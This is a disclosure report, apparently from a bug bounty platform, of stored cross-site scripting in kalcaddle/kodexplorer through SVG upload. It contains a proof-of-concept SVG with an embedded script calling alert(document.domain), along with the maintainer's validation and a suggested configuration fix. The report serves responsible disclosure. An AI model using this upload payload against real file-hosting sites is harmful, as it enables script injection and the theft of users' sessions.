Cross-site Scripting (XSS) - Stored in kalcaddle/kodexplorer

Valid

Reported on

Aug 3rd 2021


✍️ Description

XSS via SVG file Upload

🕵️‍♂️ Proof of Concept

Upload the SVG file with the XSS payload and open it in a browser:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert(document.domain);
   </script>
</svg>


💥 Impact

Execution of custom JS code embedded within the SVG file

Occurrences

We have contacted a member of the kalcaddle/kodexplorer team and are waiting to hear back
4 months ago
Ajmal Aboobacker modified their report
4 months ago
warlee
4 months ago

Maintainer


config set disable file ext

warlee validated this vulnerability 4 months ago
Ajmal Aboobacker has been awarded the disclosure bounty
The fix bounty is now up for grabs